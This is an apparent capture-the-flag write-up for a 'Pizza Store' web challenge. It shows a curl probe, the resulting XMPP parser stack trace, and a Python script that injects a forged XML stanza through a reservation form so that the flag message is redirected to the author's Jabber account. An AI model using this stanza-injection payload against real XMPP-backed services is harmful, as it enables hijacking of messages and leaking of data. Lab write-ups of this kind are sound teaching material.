This challenge was actually pretty easy, even though most people didn’t solve it.
We got a link to a webpage (a Pizza Store), where, after clicking around, we found a hint on the registration page:
Complete the Submission Form
With our patent pending XMPP reservation messaging system, our manager will be instantly notified and will respond near instantly. Our system will send your reservation FLAG right to him!
Knowing that XMPP is based on XML I tried to inject a simple <message>
, which resulted in a nice error:
ccm:~$ curl 'http://1.ctf.link:1120/reservation.php' -H 'Content-Type: application/x-www-form-urlencoded' --data 'name=asd&email=thebod%40h1798503.stratoserver.net&subject=asd&date=&time=&message=<message>&Submit=Submit'
<br />
<b>Fatal error</b>: Uncaught exception 'Fabiang\Xmpp\Exception\XMLParserException' with message 'XML parsing error: "Mismatched tag" at Line 2 at column 269' in /var/www/html/vendor/fabiang/xmpp/src/Exception/XMLParserException.php:68
Stack trace:
#0 /var/www/html/vendor/fabiang/xmpp/src/Stream/XMLStream.php(160): Fabiang\Xmpp\Exception\XMLParserException::create(Resource id #13)
#1 /var/www/html/vendor/fabiang/xmpp/src/Connection/Socket.php(162): Fabiang\Xmpp\Stream\XMLStream->parse('<message type="...')
#2 /var/www/html/vendor/fabiang/xmpp/src/Client.php(148): Fabiang\Xmpp\Connection\Socket->send('<message type="...')
#3 /var/www/html/reservation.php(45): Fabiang\Xmpp\Client->send(Object(ProxyStanza))
#4 {main}
thrown in <b>/var/www/html/vendor/fabiang/xmpp/src/Exception/XMLParserException.php</b> on line <b>68</b><br />
Now it was straight forward injection ;-) Using a little python script and the extremely complex XMPP message format XMPP Wiki we were able to craft our super-sophisticated payload and inject it:
from requests import post
url = 'http://1.ctf.link:1120/reservation.php'
data = {
'name': 'ccm',
'message': '</body></message><message from="you@jabber.tld/a" to="you@jabber.tld/a"><body>',
}
print(post(url, data=data).text)
Eventually we got a Jabber message then:
restaurant@jabber.ctf.lol: Sent from #hxp{we_need_a_xep_for_fastfood_ordering}
ccm